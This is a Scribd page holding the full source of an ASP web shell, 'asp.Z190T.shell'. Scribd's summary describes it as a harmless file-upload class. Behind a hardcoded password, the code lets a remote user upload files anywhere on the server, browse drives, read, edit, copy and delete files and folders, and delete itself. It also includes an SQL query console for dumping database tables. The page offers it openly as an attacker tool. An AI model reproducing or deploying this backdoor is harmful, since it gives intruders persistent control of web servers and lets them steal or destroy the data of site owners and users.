Scribd
Upload
158 views

ASP

The document describes a FileUploader class that handles file uploads in ASP. The class initializes dictionaries to store uploaded files and form elements. The Upload method parses binary request data to extract file names, data, and input field values, saving files to the Files dictionary and fields to the mcolFormElem dictionary. It also includes an UploadedFile class to represent individual uploaded files.

Uploaded by

mahruzzz
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
158 views

ASP

The document describes a FileUploader class that handles file uploads in ASP. The class initializes dictionaries to store uploaded files and form elements. The Upload method parses binary request data to extract file names, data, and input field values, saving files to the Files dictionary and fields to the mcolFormElem dictionary. It also includes an UploadedFile class to represent individual uploaded files.

Uploaded by

mahruzzz
Copyright
© Attribution Non-Commercial (BY-NC)
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 17

<% Function BufferContent(data) Dim strContent(64) Dim i ClearString strContent For i = 1 To LenB(data) AddString strContent,Chr(AscB(MidB(data,i,1))) Next BufferContent = fnReadString(strContent)

End Function Sub ClearString(part) Dim index For index = 0 to 64 part(index)="" Next End Sub Sub AddString(part,newString) Dim tmp Dim index part(0) = part(0) & newString If Len(part(0)) > 64 Then index=0 tmp="" Do tmp=part(index) & tmp part(index) = "" index = index + 1 Loop until part(index) = "" part(index) = tmp End If End Sub Function fnReadString(part) Dim tmp Dim index tmp = "" For index = 0 to 64 If part(index) <> "" Then tmp = part(index) & tmp End If Next FnReadString = tmp End Function Class FileUploader Public Files Private mcolFormElem Private Sub Class_Initialize() Set Files = Server.CreateObject("Scripting.Dictionary") Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") End Sub Private Sub Class_Terminate() If IsObject(Files) Then Files.RemoveAll() Set Files = Nothing End If

If IsObject(mcolFormElem) Then mcolFormElem.RemoveAll() Set mcolFormElem = Nothing End If End Sub Public Property Get Form(sIndex) Form = "" If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCas e(sIndex)) End Property Public Default Sub Upload() Dim biData, sInputName Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos Dim nPosFile, nPosBound biData = Request.BinaryRead(Request.TotalBytes) nPosBegin = 1 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) If (nPosEnd-nPosBegin) <= 0 Then Exit Sub vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) nDataBoundPos = InstrB(1, biData, vDataBounds) Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Dispositio n")) nPos = InstrB(nPos, biData, CByteString("name=")) nPosBegin = nPos + 6 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) nPosBound = InstrB(nPosEnd, biData, vDataBounds) If nPosFile <> 0 And nPosFile < nPosBound Then Dim oUploadFile, sFileName Set oUploadFile = New UploadedFile nPosBegin = nPosFile + 10 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegi n)) oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev( sFileName, "\")) nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) nPosBegin = nPos + 14 nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nP osEnd-nPosBegin)) nPosBegin = nPosEnd+4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin ) If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oU ploadFile Else nPos = InstrB(nPos, biData, CByteString(Chr(13))) nPosBegin = nPos + 4 nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem. Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) End If nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vD ataBounds)

Loop End Sub 'String Private Dim For to byte string conversion Function CByteString(sString) nIndex nIndex = 1 to Len(sString) CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) Next End Function 'Byte string to string conversion Private Function CWideString(bsString) Dim nIndex CWideString ="" For nIndex = 1 to LenB(bsString) CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) Next End Function End Class Class UploadedFile Public ContentType Public FileName Public FileData Public Property Get FileSize() FileSize = LenB(FileData) End Property Public Sub SaveToDisk(sPath) Dim oFS, oFile Dim nIndex If sPath = "" Or FileName = "" Then Exit Sub If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" Set oFS = Server.CreateObject("Scripting.FileSystemObject") If Not oFS.FolderExists(sPath) Then Exit Sub Set oFile = oFS.CreateTextFile(sPath & FileName, True) ' output mechanism modified for buffering oFile.Write BufferContent(FileData) oFile.Close End Sub Public Sub SaveToDatabase(ByRef oField) If LenB(FileData) = 0 Then Exit Sub If IsObject(oField) Then oField.AppendChunk FileData End If End Sub End Class ' Create the FileUploader IF REQUEST.QueryString("upload")="@" THEN Dim Uploader, File Set Uploader = New FileUploader ' This starts the upload process Uploader.Upload() %>

<html><title>.:. Upload Info .:.</title> <style> <!-A:link {font-style: text-decoration: none; color: #c8c8c8} A:visited {font-style: text-decoration: none; color: #777777} A:active {font-style: text-decoration: none; color: #FFFFFF} A:hover {font-style: text-decoration: cursor: hand; color: #FFFFFF} * {scrollbar-base-color:#777777; scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-facecolor:#0A750A; scrollbar-arrow-color#FFFFFF;scrollbar-shadow-color:#000000;scrollbar-highlightcolor:#000000;} input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:non e;border:1px solid #000000;} //--> </style> <body bgcolor=black text=white> <BR><BR><BR> <center><table bgcolor="#0A750A" cellpadding=4> <tr><td><Font face=arial size=-1>Hasil Upload:</font> </td></tr><tr><td bgcolor=black ><table> <% ' Check if any files were uploaded If Uploader.Files.Count = 0 Then Response.Write "File(s) not uploaded." Else ' Loop through the uploaded files For Each File In Uploader.Files.Items File.SaveToDisk Request.QueryString("txtpath") Response.Write "<TR><TD>&nbsp;</TD></TR><tr><td><font color=gray>File Up loaded: </font></td><td>" & File.FileName & "</td></tr>" Response.Write "<tr><td><font color=gray>Size: </font></td><td>" & Int(F ile.FileSize/1024)+1 & " kb</td></tr>" Response.Write "<tr><td><font color=gray>Type: </font></td><td>" & File. ContentType & "</td></tr>" Next End If %> <TR><TD>&nbsp;</TD></TR></table> </td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpa th=<%=Request.QueryString("txtpath")%>"><font face="webdings" title=" BACK " siz e=+2 >SUCCESS!!</font></a></center> <% response.End() '---- XXX END IF '-------ON ERROR RESUME NEXT Response.Buffer = True password = "a1b" ' <---Your password here If request.querystring("logoff")="@" then session("shagman")="" ' Logged off session("dbcon")="" ' Database Connection session("txtpath")="" ' any pathinfo end if If (session("shagman")<>password) and Request.form("code")="" Then %> <body bgcolor=black><center><BR><BR><FONT face=arial size=2 color=#FFFFFF>Z190T<

/FONT><BR> <center><table><tr><td> <FORM method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" > <table bgcolor=#0A750A width="20%" cellpadding=20 ><tr><td bgcolor=#000000 align =center > <INPUT type=password name=code ></td><td><INPUT name=submit type=submit value=" Access "> </td></tr></table> </td></tr><tr><td align=right> <font color=green size=-2 face=arial >ASP Z190T 2011</font></td></tr> </td></tr></table></FORM> <%If request.querystring("logoff")="@" then%> <font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='cursor: hand;' OnClic k=window.close(this);>CLOSE THIS WINDOW</font> <%end if%> <center> <% Response.END End If If Request.form("code") = password or session("shagman") = password Then session("shagman") = password Else Response.Write "<BR><B><P align=center><font color=red ><b>ACCESS DENIED </B></font><BR><font color=green face=Papyrus >Nanya dulu sama yang punya!</font ></p>" Response.END End If server.scriptTimeout=180 set fso = Server.CreateObject("Scripting.FileSystemObject") mapPath = Server.mappath(Request.Servervariables("SCRIPT_NAME")) mapPathLen = len(mapPath) if session(myScriptName) = "" then for x = mapPathLen to 0 step -1 myScriptName = mid(mapPath,x) if instr(1,myScriptName,"\")>0 then myScriptName = mid(mapPath,x+1) x=0 session(myScriptName) = myScriptName end if next Else myScriptName = session(myScriptName) end if wwwRoot = left(mapPath, mapPathLen - len(myScriptName)) Target = "c:\" ' ---Directory to which files will be DUMPED Too and From if len(Request.querystring("txtpath"))=3 then pathname = left(Request.querystring("txtpath"),2) & "\" & Request.form(" Fname") else pathname = Request.querystring("txtpath") & "\" & Request.form("Fname") end if If Request.Form("txtpath") = "" Then MyPath = Request.QueryString("txtpath")

Else MyPath = Request.Form("txtpath") End If ' ---Path correction routine If len(MyPath)=1 then MyPath=MyPath & ":\" If len(MyPath)=2 then MyPath=MyPath & "\" If MyPath = "" Then MyPath = wwwRoot If not fso.FolderExists(MyPath) then Response.Write "<font face=Papyrus color=red size=+2>Salah Menempatkan Lokas i ./dir<BR>Coba Periksa Kembali untuk Melanjutkan!" Response.end end if set folder = fso.GetFolder(MyPath) if fso.GetFolder(Target) = false then Response.Write "<font face=arial size=-2 color=red>Please create your target directory for copying files as it does not exist. </font><font face=arial size= -1 color=red>" & Target & "<BR></font>" else set fileCopy = fso.GetFolder(Target) end if If Not(folder.IsRootFolder) Then If len(folder.ParentFolder)>3 then showPath = folder.ParentFolder & "\" & folder.name Else showPath = folder.ParentFolder & folder.name End If Else showPath = left(MyPath,2) End If MyPath=showPath showPath=MyPath & "\" ' ---Path correction routine-DONE set drv=fso.GetDrive(left(MyPath,2)) if Request.Form("cmd")="Download" then if Request.Form("Fname")<>"" then Response.Buffer = True Response.Clear strFileName = Request.QueryString("txtpath") & "\" & Request.Form("Fname") Set Sys = Server.CreateObject( "Scripting.FileSystemObject" ) Set Bin = Sys.OpenTextFile( strFileName, 1, False ) Call Response.AddHeader( "Content-Disposition", "attachment; filename=" & Re quest.Form("Fname") ) Response.ContentType = "application/octet-stream" While Not Bin.AtEndOfStream Response.BinaryWrite( ChrB( Asc( Bin.Read( 1 ) ) ) ) Wend Bin.Close : Set Bin = Nothing Set Sys = Nothing Else err.number=500 err.description="Nothing selected for download..." End if

End if %> <html> <style> <!-A:link {font-style: text-decoration: none; color: #c8c8c8} A:visited {font-style: text-decoration: none; color: #777777} A:active {font-style: text-decoration: none; color: #FFFFFF} A:hover {font-style: text-decoration: cursor: hand; color: #FFFFFF} * {scrollbar-base-color:#777777; scrollbar-track-color:#777777;scrollbar-darkshadow-color:#777777;scrollbar-facecolor:#0A750A; scrollbar-arrow-color:#FFFFFF;scrollbar-shadow-color:#000000;scrollbar-highlight -color:#000000;} input,select,table {font-family:verdana,arial;font-size:11px;text-decoration:non e;border:1px solid #000000;} //--> </style> <% 'QUERY ANALYSER -- START if request.QueryString("qa")="@" then '------------sub getTable(mySQL) if mySQL="" then exit sub end if on error resume next Response.Buffer = True Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFl ag myConnectionString=session("dbCon") Set myDBConnection = Server.CreateObject("ADODB.Connection") myDBConnection.Open myConnectionString myFlag = False myFlag = errChk() set rs = Server.CreateObject("ADODB.Recordset") rs.cursorlocation = 3 rs.open mySQL, myDBConnection myFlag = errChk() if RS.properties("Asynchronous Rowset Processing") = 16 then For i = 0 To rs.Fields.Count - 1 myFields = myFields & "<TD><font color=#eeeeee size=2 face=""Ver dana, Arial, Helvetica, sans-serif"">" & rs.Fields(i).Name & "</font></TD>" Next myTitle = "<font color=gray size=6 face=webdings> </font><font color =#FFFFFF size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</ font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(" & rs.RecordCount & " row(s) affected)</TT><br>" rs.MoveFirst rs.PageSize=mNR if int(rs.RecordCount/mNR) < mPage then mPage=1 rs.AbsolutePage = mPage Response.Write myTitle & "</td><td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;&nbsp;" if mPage=1 Then Response.Write("<input type=button name=btnPagePrev value="" << "" DISABLED>") else Response.Write("<input type=button name=btnPagePrev value= "" << "">") Response.Write "<select name=cmbPageSelect>" For x = 1 to rs.PageCount

if x=mPage Then Response.Write("<option value=" & x & " SELECTED>" & x & "</ option>") else Response.Write("<option value=" & x & ">" & x & "</option>") Next Response.Write "</select><input type=hidden name=mPage value=" & mPage & ">" if mPage = rs.PageCount Then Response.Write("<input type=button name=btnPageNext value="" >> "" DISABLED>") else Response.Write("<input type=button name=btnPa geNext value="" >> "">") Response.Write "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray>Displaying <input type=text size=" & Len(mNR) & " name=txtNoRecords value=" & mNR & "> records at a time.</font>" response.Write "</td><TABLE border=0 bgcolor=#999999 cellpadding=2><TR a lign=center valign=middle bgcolor=#777777>" & myFields For x = 1 to rs.PageSize If Not rs.EOF Then response.Write "<TR>" For i = 0 to rs.Fields.Count - 1 response.Write "<TD bgcolor=#dddddd>" & server.HTMLEncode(rs(i)) & "</TD>" Next response.Write "</TR>" response.Flush() rs.MoveNext Else x=rs.PageSize End If Next response.Write "</Table>" myFlag = errChk() else if not myFlag then myTitle = "<font color=#55ff55 size=6 face=webdings>Reading,,,</font ><font color=#FFFFFF size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command (s) completed successfully.)</TT><br>" response.Write myTitle end if end if set myDBConnection = nothing set rs2 = nothing set rs = nothing End sub sub getXML(mySQL) if mySQL="" then exit sub end if on error resume next Response.Buffer = True Dim myDBConnection, rs, myHtml,myConnectionString, myFields,myTitle,myFl ag myConnectionString=session("dbCon") Set myDBConnection = Server.CreateObject("ADODB.Connection") myDBConnection.Open myConnectionString myFlag = False myFlag = errChk() set rs = Server.CreateObject("ADODB.Recordset") rs.cursorlocation = 3

rs.open mySQL, myDBConnection myFlag = errChk() if RS.properties("Asynchronous Rowset Processing") = 16 then Response.Write "<font color=#55ff55 size=4 face=webdings>i</font><font c olor=#cccccc> Copy paste this code and save as '.xml '</font></td></tr><tr><td>" Response.Write "<textarea cols=75 name=txtXML rows=15>" rs.MoveFirst response.Write vbcrlf & "<?xml version=""1.0"" ?>" response.Write vbcrlf & "<TableXML>" Do While Not rs.EOF response.Write vbcrlf & "<Column>" For i = 0 to rs.Fields.Count - 1 response.Write vbcrlf & "<" & rs.Fields(i).Name & ">" & rs(i) & "</" & rs.Fields(i).Name & ">" & vbcrlf response.Flush() Next response.Write "</Column>" rs.MoveNext Loop response.Write "</TableXML>" response.Write "</textarea>" myFlag = errChk() else if not myFlag then myTitle = "<font color=#55ff55 size=6 face=webdings>Reading,,,</font ><font color=#FFFFFF size=2 face=""Verdana, Arial, Helvetica, sans-serif"">Query results :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font color=gray><TT>(The command (s) completed successfully.)</TT><br>" response.Write myTitle end if end if End sub Function errChk() if err.Number <> 0 and err.Number <> 13 then dim myText myText = "<font color=#FFFFFF size=4 face=webdings>X</font><font color=r ed size=2 face=""Verdana, Arial, Helvetica, sans-serif""> " & err.Description & "</font><BR>" response.Write myText err.Number = 0 errChk = True end if end Function Dim myQuery,mPage,mNR myQuery = request.Form("txtSQL") if request.form("txtCon") <> "" then session("dbcon") = request.form("txtCon ") if request.QueryString("txtpath") then session("txtpath")=request.QueryStrin g("txtpath") mPage=cint(request.Form("mPage")) if mPage<1 then mPage=1 mNR=cint(request.Form("txtNoRecords")) if mNR<1 then mNR=30 %> <html><title>Spy Analisis</title> <script language="VbScript"> sub cmdSubmit_onclick

if Document.frmSQL.txtSQL.value = "" then Document.frmSQL.txtSQL.value = "SELECT * FROM " & vbcrlf & "WHERE " & vb crlf & "ORDER BY " exit sub end if Document.frmSQL.Submit end sub sub cmdTables_onclick Document.frmSQL.txtSQL.value = "select name as 'TablesListed' from sysobject s where xtype='U' order by name" Document.frmSQL.Submit end sub sub cmdColumns_onclick strTable =InputBox("Return Columns for which Table?","Table Name...") strTable = Trim(strTable) if len(strTable) > 0 Then SQL = "select name As 'ColumnName',xusertype As 'DataType',length as Len gth from syscolumns where id=(select id from sysobjects where xtype='U' and name ='" & strTable & "') order by name" Document.frmSQL.txtSQL.value = SQL Document.frmSQL.Submit End if end sub sub cmdClear_onclick Document.frmSQL.txtSQL.value = "" end sub sub cmdBack_onclick Document.Location = "<%=Request.Servervariables("SCRIPT_NAME")%>?txtpath=<%= session("txtpath")%>" end sub Sub btnPagePrev_OnClick Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1 Document.frmSQL.Submit end sub Sub btnPageNext_OnClick Document.frmSQL.mPage.value = Document.frmSQL.mPage.value + 1 Document.frmSQL.Submit end sub Sub cmbPageSelect_onchange Document.frmSQL.mPage.value = (Document.frmSQL.cmbPageSelect.selectedIndex + 1) Document.frmSQL.Submit End Sub Sub txtNoRecords_onclick Document.frmSQL.cmbPageSelect.selectedIndex = 0 Document.frmSQL.mPage.value = 1 End Sub </script> <style> TR {font-family: sans-serif;} </style> <body bgcolor=black><center> <form name=frmSQL action="<%=Request.Servervariables("SCRIPT_NAME")%>?qa=@" meth od=Post> <table border="0"><tr> <td align=right><font color=#FFFFFF size="4" face="webdings">X </font><fon t color="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">Paste your connection string here : </font><font color="#CCCCCC"> <input name=txtCon type="text" size="60" value="<%=session("dbcon")%>"> </font><BR>

<textarea cols=75 name=txtSQL rows=4 wrap=PHYSICAL><%=myQuery%></textare a><BR> <input name=cmdSubmit type=button value=Submit><input name=cmdTables typ e=button value=Tables><input name=cmdColumns type=button value=Columns><input na me="reset" type=reset value=Reset><input name=cmdClear type=button value=Clear>< input name=cmdBack type=button value="Return"><input type="Checkbox" name="chkXM L" <%IF Request.Form("chkXML")= "on" tHEN Response.Write " checked " %>><font co lor="#CCCCCC" size="1" face="Verdana, Arial, Helvetica, sans-serif">GenerateXML< /FONT> </td> <td>XXXXXX</td><td> <center><B><font color=white >Z190T</font></B><BR><font color=green size=2>< TT>r00t h4ck3r</TT></font></center> </td></tr></table> <table><tr><td><%If Request.Form("chkXML") = "on" Then getXML(myQuery) Else get Table(myQuery) %></td></tr></table></form> <HR><P align=right><font color=#FFFFFF><TT>Copyright 2011 Z190T</B></font><BR><f ont size=-1 color=gray>Cheers to <a href="mailto:[email protected]">mahruz</a> for all the help!</font></p><BR> </body> </html> <% set myDBConnection = nothing set rs2 = nothing set rs = nothing '------------response.End() end if 'QUERY ANALYSER -- STOP %> <title>asp.Z190T.shell</title> </head> <body bgcolor=black text=white topAprgin="0"> <% Response.Flush 'Code Optimisation START select case request.form("cmd") case "" If request.form("dirStuff")<>"" then Response.write "<font face=arial size=-2>You need to click [Create] or [Delete] for folder operations to be</font>" Else Response.Write "<font face=Papyrus size=3>shell</font>" End If case " Copy " ' ---Copy From Folder routine Start If Request.Form("Fname")="" then Response.Write "<font face=arial size=-2 color=#FFFFFF>Copying: " & Requ est.QueryString("txtpath") & "\???</font><BR>" err.number=424 Else Response.Write "<font face=arial size=-2 color=#FFFFFF>Copying: " & Request.QueryString("txtpath") & "\" & Request.Form("Fname") & "</font><BR>" fso.CopyFile Request.QueryString("txtpath") & "\" & Request.Form("Fn ame"),Target & Request.Form("Fname") Response.Flush End If ' ---Copy From Folder routine Stop case " Copy " ' ---Copy Too Folder routine Start

If Request.Form("ToCopy")<>"" and Request.Form("ToCopy") <> "-----------------------------" Then Response.Write "<font face=arial size=-2 color=#FFFFFF>Copying: " & Request.Form("txtpath") & "\" & Request.Form("ToCopy") & "</font><BR>" Response.Flush fso.CopyFile Target & Request.Form("ToCopy"), Request.Form("txtpath" ) & "\" & Request.Form("ToCopy") Else Response.Write "<font face=arial size=-2 color=#FFFFFF>Copying: " & Requ est.Form("txtpath") & "\???</font><BR>" err.number=424 End If ' ---Copy Too Folder routine Stop case "Delete" 'two of this if request.form("todelete")<>"" then ' ---File Delete start If (Request.Form("ToDelete")) = myScriptName then'(Right(Request.Serverv ariables("SCRIPT_NAME"),len(Request.Servervariables("SCRIPT_NAME"))-1)) Then Response.Write "<center><font face=arial size=-2 color=#FFFFFF><BR><BR>< HR>SELFDESTRUCT INITIATED...<BR>" Response.Flush fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelet e") %>+++DONE+++</font><BR><HR> <font color=gray size=-2 face=arial title="To avoid anyone from seeing what you were doing by using the browser back button."><span style='curso r: hand;' OnClick=window.close(this);>TUTUP JENDELA INI</font> <%Response.End End If If Request.Form("ToDelete") <> "" and Request.Form("ToDelete") <> "-----------------------------" Then Response.Write "<font face=arial size=-2 color=#FFFFFF>Deleting: " & Request.Form("txtpath") & "\" & Request.Form("ToDelete") & "</font><BR>" Response.Flush fso.DeleteFile Request.Form("txtpath") & "\" & Request.Form("ToDelet e") Else Response.Write "<font face=arial size=-2 color=#FFFFFF>Deleting: " & Request.Form("txtpath") & "\???</font><BR>" err.number=424 End If ' ---File Delete stop Else If request.form("dirStuff")<>"" then Response.Write "<font face=arial size=-2 color=#FFFFFF>Deleting fold er...</font><BR>" fso.DeleteFolder MyPath & "\" & request.form("DirName") end if End If case "Edit/Create" %> <center><table bgcolor="#0A750A" cellpadding="8"><tr> <td bgcolor="#000000" valign="bottom"> <Font face=arial SIZE=-2 color=#FFFFFF>NOTE: The following edit box maynot d isplay special characters from files. Therefore the contents displayed maynot be considered correct or accurate.</font> </td></tr><tr><td><TT>Path=> <%=pathname%><BR><BR> <% ' fetch file information Set f = fso.GetFile(pathname)

%> file Type: <%=f.Type%><BR> file Size: <%=FormatNumber(f.size,0)%> bytes<BR> file Created: <%=FormatDateTime(f.datecreated,1)%>&nbsp;<%=FormatDateTime(f.date created,3)%><BR> last Modified: <%=FormatDateTime(f.datelastmodified,1)%>&nbsp;<%=FormatDateTime( f.datelastmodified,3)%><BR> last Accessed: <%=FormatDateTime(f.datelastaccessed,1)%>&nbsp;<%=FormatDateTime( f.datelastaccessed,3)%><BR> file Attributes: <%=f.attributes%><BR> <% Set f = Nothing response.write "<center><FORM action=""" & Request.Servervariables("SCRIPT_N AME") & "?txtpath=" & MyPath & """ METHOD=""POST"">" 'read the file Set f = fso.OpenTextFile(pathname) If NOT f.AtEndOfStream Then fstr = f.readall f.Close Set f = Nothing Set fso = Nothing response.write "<TABLE><TR><TD>" & VBCRLF response.write "<FONT TITLE=""Use this text area to view or change the c ontents of this document. Click [Save As] to store the updated contents to the w eb server."" FACE=arial SIZE=1 ><B>DOCUMENT CONTENTS</B></FONT><BR>" & VBCRLF response.write "<TEXTAREA NAME=FILEDATA ROWS=16 COLS=85 WRAP=OFF>" & Ser ver.HTMLEncode(fstr) & "</TEXTAREA>" & VBCRLF response.write "</TD></TR></TABLE>" & VBCRLF %> <BR><center><TT>LOCATION <INPUT TYPE="TEXT" SIZE=48 MAXLENGTH=255 NAME="PATHNAME " VALUE="<%=pathname%>"> <INPUT TYPE="SUBMIT" NAME=cmd VALUE="Save As" TITLE="This write to the file spec ifed and overwrite it without warning."> <INPUT TYPE="SUBMIT" NAME="POSTACTION" VALUE="Cancel" TITLE="If you recieve an e rror while saving, then most likely you do not have write access OR the file att ributes are set to readonly !!"> </FORM></td></tr></table><BR> <% response.end case "Create" Response.Write "<font face=arial size=-2 color=#FFFFFF>Folder Baru</font ><BR>" fso.CreateFolder MyPath & "\" & request.form("DirName") case "Save As" Response.Write "<font face=arial size=-2 color=#FFFFFF>File Tersimpan</f ont><BR>" Set f = fso.CreateTextFile(Request.Form("pathname")) f.write Request.Form("FILEDATA") f.close end select 'Code Optimisation STOP ' ---DRIVES start here If request.querystring("getDRVs")="@" then %> <BR><BR><BR><center><table bgcolor="#0A750A" cellpadding=4> <tr><td><Font face=arial size=-1>Informasi Drive yang didapat:</font> </td></tr><tr><td bgcolor=black > <table><tr><td><tt>Drive</td><td><tt>Type</td><td><tt>Path</td><td><tt>ShareName </td><td><tt>Size[MB]</td><td><tt>ReadyToUse</td><td><tt>VolumeLabel</td><td></t

r> <%For Each thingy in fso.Drives%> <tr><td><tt> <%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi ngy.Path%> </td><td><tt> <%=thingy.ShareName%> </td><td><tt> <%=((thingy.TotalSi ze)/1024000)%> </td><td><tt> <%=thingy.IsReady%> </td><td><tt> <%=thingy.VolumeN ame%> <%Next%> </td></tr></table> </td></tr></table><BR><a href="<%=Request.Servervariables("SCRIPT_NAME")%>?txtpa th=<%=MyPath%>"><font face="webdings" title=" KEMBALI " size=+2 >SUCCESS!!</font ></a></center> <% Response.end end if ' ---DRIVES stop here %> <link href='http://www.indonesiaindonesia.com/imagehosting/images/18392/1_avatar 12847_6.gif' rel='shortcut icon'/> <HEAD> <SCRIPT Language="VBScript"> sub getit(thestuff) if right("<%=showPath%>",1) <> "\" Then document.myform.txtpath.value = "<%=showPath%>" & "\" & thestuff Else document.myform.txtpath.value = "<%=showPath%>" & thestuff End If document.myform.submit() End sub </SCRIPT> </HEAD> <% '---Report errors select case err.number case "0" response.write "<font face=Papyrus color=#55ff55>Reading,,,</font> <font fac e=arial size=-2>Sukses</font>" case "58" response.write "<font face=arial size=-1 color=red>Folder nggak terbaca!!</f ont>" case "70" response.write "<font face=arial size=-1 color=red>nggak ada hak akses, fold er hanya bisa dibaca!!</font>" case "76" response.write "<font face=arial size=-1 color=red>Path nggak diketahui...</ font>" case "424" response.write "<font face=arial size=-1 color=red>Hilang, Data tidak memada i ATAU file readonly ...</font>" case else response.write "<font face=arial size=-1 color=red>" & err.description & "</ font>" end select '---Report errors end

%> <center><B><font color=Gray >Z190T</font><BR><font color=green size=4><TT>r00t h 4ck3r</TT></font></center> <font face=Courier> <center><table><tr><td> <form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" name="m yform" > <Table bgcolor=#0A750A ><tr><td bgcolor=#0A750A > <font face=Arial size=-2 color=#FFFFFF > Directory : </font></td><td align=right ><font face=Arial size=-2 color=#FFFFFF >Volume:</font> <%=drv.VolumeName%> </t d></tr> <tr><td colspan=2 cellpadding=2 bgcolor=#000000 ><font face=Arial size=-1 color= gray>Client: http://<%=Request.ServerVariables("SERVER_NAME")%><%=Request.Server variables("SCRIPT_NAME")%></Font><BR><font face=verdana size=3 > <%=showPath%></ Font> <BR><input type=text width=40 size=60 name=txtpath value="<%=showPath%>" ><input type=submit name=cmd value=" View " > </td></tr></form></table></center> </td><td><center> <table bgcolor=#0A750A cellpadding=4><tr><td bgcolor=black ><a href="<%=Request. Servervariables("SCRIPT_NAME")%>?getDRVs=@&txtpath=<%=MyPath%>"><font size=-2 fa ce=arial>Retrieve Available Network Drives</a></td></tr> <tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NA ME")%>?qa=@&txtpath=<%=MyPath%>"><font size=-2 face=arial>SQL Query Analyser</A> </td></tr> <tr><td bgcolor=black align=right><A HREF="<%=Request.Servervariables("SCRIPT_NA ME")%>?logoff=@&...dah.selesai.depesnya.g0dr00t_Z190T"><font size=-2 face=arial> +++LOGOFF+++</A></td></tr></table> </td></tr></table> <p align=center ><Table width=75% bgcolor=#0A750A cellpadding=4 ><tr><td> <form method="post" action="<%=Request.Servervariables("SCRIPT_NAME")%>" ><font face=arial size=-1 >Delete file from current directory:</font><BR> <select size=1 name=ToDelete > <option>------------------------------</option>" <% fi=0 For each file in folder.Files Response.Write "<option>" & file.name & "</option>" fi=fi+1 next Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value=Delete ></form></td><td>" Response.Write "<form method=post name=frmCopyFile action=""" & Request.Serv ervariables("SCRIPT_NAME") & """ ><font face=arial size=-1 >Copy file too curren t directory:</font><br><select size=1 name=ToCopy >" Response.Write "<option>------------------------------</option>" For each file in fileCopy.Files Response.Write "<option>" & file.name & "</option>" next Response.Write "</select><input type=hidden name=txtpath value=""" & MyPath & """><input type=Submit name=cmd value="" Copy "" ></form></td></tr></Table>" Response.Flush ' ---View Tree Begins Here Response.Write "<table Cellpading=2 width=75% bgcolor=#0A750A ><tr><td valig n=top width=50% bgcolor=#000000 >Folders:<BR><BR>" fo=0 Response.Write "<font face=wingdings color=red >-</font> <FONT COLOR=#c8c8c8 ><span style='cursor: hand;' OnClick=""getit('..')"">..</span></FONT><BR>" For each fold in folder.SubFolders '-->FOLDERz

